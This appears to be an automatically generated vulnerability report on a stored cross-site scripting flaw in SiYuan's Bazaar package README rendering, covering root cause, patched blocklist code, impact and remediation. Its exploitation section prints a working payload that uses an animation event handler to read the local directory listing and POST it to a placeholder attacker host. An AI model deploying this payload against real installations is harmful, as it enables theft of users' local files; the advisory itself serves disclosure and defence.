CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-54070

CVE-2026-54070: Stored Cross-Site Scripting via Modern HTML5 Event Handler Bypass in SiYuan Bazaar

Alon Barad
Alon Barad
Software Engineer

Jul 10, 2026·5 min read·4 visits

Executive Summary (TL;DR)

Stored XSS in SiYuan's Bazaar package rendering component allows unauthenticated attackers to execute arbitrary JavaScript in the context of the administrator origin, leading to complete workspace compromise.

A high-severity Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan prior to version 3.7.0. The vulnerability is located within the server-side Markdown-to-HTML parsing component for the Bazaar marketplace packages. Due to an incomplete event-handler attribute blocklist in the lute parsing engine and a lack of client-side DOM sanitization, malicious package authors can bypass restrictions using modern HTML5 event handlers. When an authenticated administrator views a malicious package, the embedded JavaScript runs in the administrator origin, allowing unauthorized workspace access, local file reading, and remote API execution.

Vulnerability Overview

SiYuan is an open-source, self-hosted personal knowledge management system that allows users to manage local Markdown workspaces. The platform features an integrated Bazaar marketplace, enabling users to discover and download third-party community themes, plugins, and templates. This modular ecosystem necessitates the retrieval and rendering of remote content within the application interface.

The attack surface is exposed in the Bazaar package viewing flow inside the Settings panel. When an administrator browses the marketplace, the backend kernel fetches the package README file from a remote registry and processes it to display detailed information. The backend engine processes the raw Markdown and converts it into HTML output.

This vulnerability is categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-184 (Incomplete List of Disallowed Inputs). An attacker can host a malicious package on the public Bazaar registry. This action triggers code execution when an administrator inspects the package, without requiring package installation.

Root Cause Analysis

The backend kernel employs the lute engine to parse Markdown to HTML inside the renderPackageREADME function in kernel/bazaar/readme.go. To mitigate potential injection vectors, the engine is initialized with sanitization enabled via luteEngine.SetSanitize(true). This configuration activates the internal attribute validator within the parsing library.

The sanitizer relies on a negative security model (blocklist) to strip dangerous elements. The function checks parsed HTML attributes against a hardcoded map of prohibited handlers, called eventAttrs. This collection was based on legacy web elements and does not contain contemporary pointers, transitions, or animations.

Because the blocklist is not exhaustive, modern event handlers such as onpointerover, onpointerdown, onauxclick, onbeforetoggle, onfocusin, onanimationstart, and ontransitionend are not recognized as dangerous. The parser passes these attributes through to the generated HTML output unchanged. The client receives this raw output and loads it directly into the application context.

Code Analysis and Comparison

In vulnerable versions, the kernel converts the content to HTML and transfers it directly to the frontend. The critical vulnerability on the frontend client resides in app/src/config/bazaar.ts where the response is rendered:

// Inside app/src/config/bazaar.ts (Vulnerable path)
// The HTML output is inserted directly into the main DOM
mdElement.innerHTML = renderedHTML;

No secondary client-side library (such as DOMPurify) sanitizes this element, and it is placed inside the primary document window rather than inside a sandboxed iframe. Additionally, the application does not implement a restrictive Content Security Policy (CSP) on the local host origin.

In the patched release, the lute rendering library has been updated to filter out modern event handlers, or the application was adjusted to utilize safer rendering pipelines. An expanded representation of the legacy sanitization map contrasted with the updated, secure validation approach is demonstrated below:

// VULNERABLE: Incomplete list derived from legacy event types
var eventAttrs = map[string]bool{
    "onclick":     true,
    "onload":      true,
    "onerror":     true,
    "onmouseover": true,
}
 
// PATCHED: Complete blocklist including pointer and CSS keyframe handlers
var eventAttrs = map[string]bool{
    "onclick":          true,
    "onload":           true,
    "onerror":          true,
    "onmouseover":      true,
    "onpointerover":    true,
    "onpointerdown":    true,
    "onauxclick":       true,
    "onbeforetoggle":   true,
    "onfocusin":        true,
    "onanimationstart": true,
    "ontransitionend":  true,
}

Exploitation Methodology

Exploitation involves registering a package on the SiYuan Bazaar registry containing custom Markdown in the README.md file. The attacker places a structured HTML tag inside the Markdown to trigger JavaScript execution upon page load or simple user navigation.

To achieve interaction-less exploitation, an attacker can specify a hidden element with CSS keyframe animations. The onanimationstart event triggers immediately when the browser calculates the layout, requiring no active movement or clicks from the administrator:

<style>
@keyframes triggerXSS {
  from { clip: rect(1px, 1px, 1px, 1px); }
  to { clip: rect(0px, 0px, 0px, 0px); }
}
.xss-trigger {
  animation: triggerXSS 0.1s;
}
</style>
 
<div class="xss-trigger" onanimationstart="
  fetch('/api/file/readDir', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ path: '/' })
  })
  .then(r => r.json())
  .then(files => {
     fetch('https://attacker.com/exfil', {
       method: 'POST',
       body: JSON.stringify(files)
     });
  });
"></div>

If pointer interactions are preferred, the payload can be bound to onpointerover inside an eye-catching element. As soon as the mouse pointer brushes against the package overview container, the handler invokes the client-side API.

Technical Impact Assessment

The impact of this vulnerability is severe because the local SiYuan application has access to local desktop system files via its integrated local API server. Since the injected code executes in the context of the running application, the attacker inherits the rights of the logged-in administrator.

The script can call any API endpoint exposed on the local server origin. Key capabilities include listing directory contents, reading arbitrary local notes, writing malicious files, or modifying current application configurations. The compromised workspace can then be exfiltrated via external HTTP requests since no Content Security Policy restricts external communication.

Remediation and Defensive Measures

The primary resolution is to upgrade all SiYuan installations to version 3.7.0 or higher. Version 3.7.0 contains updated validation logic within the lute markdown component and hardens the application against event handler bypasses.

For environments where updating is delayed, the following temporary workarounds should be applied:

  1. Do not open the 'Bazaar' or 'Marketplace' configuration sections.

  2. Enforce local host restrictions or firewall configurations that block outbound internet communication from the SiYuan process to untrusted domains, preventing third-party package synchronization.

  3. Implement local intercepting proxies to strip custom event attributes before they are parsed by the application frontend.

Fix Analysis (1)

Technical Appendix

CVSS Score
7.1/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L
EPSS Probability
0.18%
Top 92% most exploited

Affected Systems

SiYuan Note-Taking Application

Affected Versions Detail

Product
Affected Versions
Fixed Version
SiYuan
SiYuan
< 3.7.03.7.0
AttributeDetail
CWE IDCWE-79 / CWE-184
Attack VectorNetwork
CVSS Score7.1 (High)
EPSS Score0.0018 (Percentile: 7.75%)
ImpactStored Cross-Site Scripting (XSS)
Exploit Statuspoc
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1185Browser Session Hijacking
Collection
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product receives input, but does not neutralize or incorrectly neutralizes authorized HTML elements or event handlers prior to executing the contents in a web page context.

Known Exploits & Detection

GitHub Security AdvisoryDocumented proof of concept outlining exploitation via pointer and animation events.

Vulnerability Timeline

Vulnerability Advisory Published (GHSA-w7cg-whh7-xp28)
2026-06-24
Patched Version 3.7.0 Released
2026-06-24
NVD Record Updated
2026-06-26

References & Sources

  • [1]GitHub Security Advisory GHSA-w7cg-whh7-xp28
  • [2]NVD CVE-2026-54070 Detail
  • [3]SiYuan Fix Commit 27e0051e0d067892e833df1063cb2fb469600e98
  • [4]CVE-2026-54070 Record

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 3 hours ago•GHSA-489G-7RXV-6C8Q
8.2

CVE-2026-27826: DNS Rebinding TOCTOU Bypass in mcp-atlassian Server

A DNS-rebinding Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the mcp-atlassian server before version 0.17.0. The server processes unauthenticated client-supplied URLs via custom headers, validating the destination IP but failing to pin the resolved address before connecting. This allows remote adjacent-network attackers to achieve Server-Side Request Forgery (SSRF) and access restricted resources or cloud metadata services.

Amit Schendel
Amit Schendel
3 views•5 min read
•about 5 hours ago•CVE-2026-49866
7.5

CVE-2026-49866: CPU-Based Denial of Service in @libp2p/gossipsub Protobuf Parser

A high-severity denial-of-service vulnerability in @libp2p/gossipsub prior to version 16.0.0 allows unauthenticated remote attackers to trigger event loop starvation and complete node freeze by exploiting unbounded protobuf decoding limits and nested synchronous array iteration loops.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 6 hours ago•CVE-2026-49858
5.9

CVE-2026-49858: Cross-User Attribute and Relation Leak in API Platform Core Serializers

CVE-2026-49858 is a vulnerability in API Platform Core's JSON:API and HAL item normalizers where conditionally secured attributes are cached globally in memory. When deployed in long-running PHP execution environments such as FrankenPHP worker mode, Swoole, or RoadRunner, this persistent caching bypasses property-level security constraints, allowing unprivileged users to access sensitive, unauthorized fields cached during privileged requests.

Alon Barad
Alon Barad
5 views•7 min read
•about 7 hours ago•CVE-2026-5078
5.3

CVE-2026-5078: Log Forging and Injection via :remote-user Token in Morgan Logging Middleware

CVE-2026-5078 is a log injection vulnerability in Morgan, the widely deployed Node.js HTTP request logging middleware. The vulnerability arises because the ':remote-user' logging token decodes and outputs basic authentication usernames containing control characters, such as Carriage Return (CR) and Line Feed (LF), without sanitization. An unauthenticated attacker can bypass native HTTP header parsers by Base64-encoding CRLF sequences in the Authorization header. When Morgan logs the request, these control characters force newlines in the log stream, enabling log forging, SIEM evasion, and system activity spoofing.

Alon Barad
Alon Barad
6 views•7 min read
•about 18 hours ago•CVE-2026-48861
2.1

CVE-2026-48861: HTTP Request Splitting and Smuggling via Method Parameter CRLF Injection in Elixir Mint

CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 18 hours ago•CVE-2026-49753
6.3

CVE-2026-49753: HTTP Request/Response Smuggling via Inconsistent Content-Length Parsing in Elixir Mint Client

An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.

Amit Schendel
Amit Schendel
6 views•6 min read